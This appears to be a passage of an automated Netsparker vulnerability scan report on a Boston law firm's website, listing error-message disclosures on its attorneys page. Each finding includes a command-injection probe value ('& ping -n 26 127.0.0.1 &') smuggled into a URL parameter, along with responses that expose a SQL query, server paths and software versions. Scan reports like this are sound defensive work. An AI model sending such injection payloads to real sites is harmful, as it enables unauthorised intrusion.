Enforcement: What's Up at the SEC: Whistleblowing, Insider Trading, and the FCPA�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=1156" title="Jonathan Kotlier moderates BBA panel �Meet the Massachusetts Securities Division�">Jonathan Kotlier moderates BBA panel �Meet the Massachusetts Securities Division�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=1050" title="Jonathan Kotlier appointed co-chair of the Boston Bar Association�s Criminal Justice Section">Jonathan Kotlier appointed co-chair of the Boston Bar Association�s Criminal Justice Section<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=1042" title="Jonathan Kotlier and Benjamin Mack publish �The SEC�s new cooperation initiative: Closer coordination with DOJ could have collateral upsides for defendants�">Jonathan Kotlier and Benjamin Mack publish �The SEC�s new cooperation initiative: Closer coordination with DOJ could have collateral upsides for defendants�<br /><em>Westlaw Journal White-Collar Crime</em></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=992" title="Jonathan Kotlier and Ian Roffman participate in the BBA�s program �Securities Fraud 2010: The �New Deal� at the SEC, Insider Trading, and a White Collar Trial�">Jonathan Kotlier and Ian Roffman participate in the BBA�s program �Securities Fraud 2010: The �New Deal� at the SEC, Insider Trading, and a White Collar Trial�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=819" title="Jonathan Kotlier and Ian Roffman participate in BBA program �Securities Fraud 2009: Madoff, Trials, and the SEC's View on Enforcement�">Jonathan Kotlier and Ian Roffman participate in BBA program �Securities Fraud 2009: Madoff, Trials, and the SEC's View on Enforcement�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=742" title="Jonathan Kotlier and Ian Roffman present at ECOA 2008 Annual Business Ethics and Compliance Conference">Jonathan Kotlier and Ian Roffman present at ECOA 2008 Annual Business Ethics and Compliance Conference<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=678" title="Jonathan Kotlier appointed to Judicial Nominating Commission">Jonathan Kotlier appointed to Judicial Nominating Commission<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=655" title="Jonathan Kotlier and Ian Roffman host ECOA's webinar on personal liability for compliance professionals">Jonathan Kotlier and Ian Roffman host ECOA's webinar on personal liability for compliance professionals<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=644" title="Jonathan Kotlier moderated BBA seminar on SEC Practices and Investigations">Jonathan Kotlier moderated BBA seminar on SEC Practices and Investigations<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=553" title="Jonathan Kotlier publishes article on options backdating investigations">Jonathan Kotlier publishes article on options backdating investigations<br /><em>New England In-House</em></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=467" title="Jonathan Kotlier moderates BBA panel on options backdating investigations">Jonathan Kotlier moderates BBA panel on options backdating investigations<br /></a></li><li class="toggle"><span id="articleArrow"><img src="media/images/down_arrow.gif" width="6" height="6"></span> <a href="javascript:toggleDisplay('temp_articles','articleButton','articleArrow')"><span id="articleButton">More</span></a></li></ul></div><div id="NarrativeText"><p>Jonathan L. Kotlier is a partner in the Litigation Department and a member of the Government Investigations and White Collar Crime practice group. Jonathan joined the firm in 2004 from the U.S. Attorney&rsquo;s Office where, for eight of his twelve years, he was Chief of the Economic Crimes Unit. <br /></p><p>Since joining Nutter, Jonathan has represented several corporations and individuals in white collar criminal and complex civil cases and investigations involving alleged securities fraud, health care fraud, environmental crimes, government contracting fraud, and False Claims Act violations. Much of his work has been in the area of defending securities related actions involving accounting fraud issues. He has also conducted internal investigations on behalf of corporations and special litigation committees. He frequently represents individuals and corporations before the Securities and Exchange Commission. <br /></p><p>Recently, Jonathan won the dismissal of a securities fraud complaint against a bond underwriter, which was upheld by the First Circuit Court of Appeals. Some of his other recent representatio..
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /attorneys.php

/attorneys.php

http://www.nutter.com/attorneys.php?AttorneyID=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

Parameters

Parameter Type Value
AttorneyID GET "& ping -n 26 127.0.0.1 &

Request

GET /attorneys.php?AttorneyID=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:09:32 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Transfer-Encoding: chunked
Content-Type: text/html


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"& ping -n 26 127.0.0.1 &' at line 1 | 1064<BR>sql: SELECT FirstName,LastName FROM attorneys WHERE AttorneyID=\"& ping -n 26 127.0.0.1 &<br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /usr/local/apache/pnc_nutter/pointclique/maintenance/_libs/lib.php:68) in <b>/usr/local/apache/htdocs/attorneys.php</b> on line <b>16</b><br /><!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Attorneys : Nutter McClennen & Fish LLP--> <title>Attorneys : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.209.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.226.gif" border="0" title="" alt=""></h2><span><img src="http://www.nutter.com/media/images/search_for_an.gif" alt="Search For An Attorney"/></span><div id="Alpha"><a href="http://www.nutter.com/attorneys.php?letter=A">A</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=B">B</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=C">C</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=D">D</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=E">E</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=F">F</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=G">G</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=H">H</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=I">I</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=J">J</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=K">K</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=L">L</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=M">M</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=N">N</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=O">O</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=P">P</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Q">Q</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=R">R</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=S">S</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=T">T</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=U">U</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=V">V</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=W">W</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=X">X</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Y">Y</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Z">Z</a></div><form method="post" action="http://www.nutter.com/attorneys.php"> <table cellpadding="0" cellspacing="0" id="Form"> <tr> <td><label for="FirstName">First Name</label></td> <td><input type="text" name="FirstName" value="" id="FirstName"/></td> <td><label for="LastName">Last Name</label></td> <td><input type="text" name="LastName" value="" id="LastName"/></td> <td></td> </tr> <tr> <td><label for="Keywords">Keywords</label></td> <td colspan="3"><input type="text" name="Keyword" value="" id="Keywords"/></td> <td><input type="image" src="/media/images/attorney_go_button.gif" name="Submit" id="Go"/></td> </tr> </table> <div id="subMenus"> <ul id="menuList"> <li> <a href="javascript:void(0)" title="Practice Area" id="Practice" class="subLinks">Practice Area</a> <ul class="subCategoriesScroll" onmouseover="colorItem('Practice', 'subHover')" onmouseout="colorItem('Practice', 'subLinks')"> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=2" title="Antitrust">Antitrust</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=3" title="Banking and Financial Services">Banking and Financial Services</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=5" title="Business/General Corporate">Business/General Corporate</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=6" title="Commercial Finance">Commercial Finance</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=7" title="Education">Education</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=8" title="Emerging Companies/High Technology">Emerging Companies/High Technology</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=37" title="Energy Law">Energy Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=10" title="Environmental Law">Environmental Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=11" title="Government Investigations and White Collar Defense">Government Investigations and White Collar Defense</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=13" title="Hedge Funds">Hedge Funds</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=15" title="Intellectual Property">Intellectual Property</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=16" title="IP Litigation">IP Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=9" title="Labor, Employment and Benefits">Labor, Employment and Benefits</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=17" title="Land Use, Permitting and Development">Land Use, Permitting and Development</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=19" title="Litigation">Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=34" title="Litigation: Data Security Breach and Privacy">Litigation: Data Security Breach and Privacy</a></li> <li><a href="http://www.nutter.c..
Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
- /attorneys.php

/attorneys.php

http://www.nutter.com/attorneys.php?AttorneyID=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

Parameters

Parameter Type Value
AttorneyID GET "& ping -n 26 127.0.0.1 &

Identified Error Message

<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /usr/local/apache/pnc_nutter/pointclique/maintenance/_libs/lib.php:68) in <b>/usr/local/apache/htdocs/attorneys.php</b> on line <b>16</b>

Request

GET /attorneys.php?AttorneyID=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:09:32 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Transfer-Encoding: chunked
Content-Type: text/html


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"& ping -n 26 127.0.0.1 &' at line 1 | 1064<BR>sql: SELECT FirstName,LastName FROM attorneys WHERE AttorneyID=\"& ping -n 26 127.0.0.1 &<br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /usr/local/apache/pnc_nutter/pointclique/maintenance/_libs/lib.php:68) in <b>/usr/local/apache/htdocs/attorneys.php</b> on line <b>16</b><br /><!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Attorneys : Nutter McClennen & Fish LLP--> <title>Attorneys : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.209.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.226.gif" border="0" title="" alt=""></h2><span><img src="http://www.nutter.com/media/images/search_for_an.gif" alt="Search For An Attorney"/></span><div id="Alpha"><a href="http://www.nutter.com/attorneys.php?letter=A">A</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=B">B</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=C">C</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=D">D</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=E">E</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=F">F</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=G">G</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=H">H</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=I">I</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=J">J</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=K">K</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=L">L</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=M">M</a>&nbsp;&nbsp;&nbsp;<a 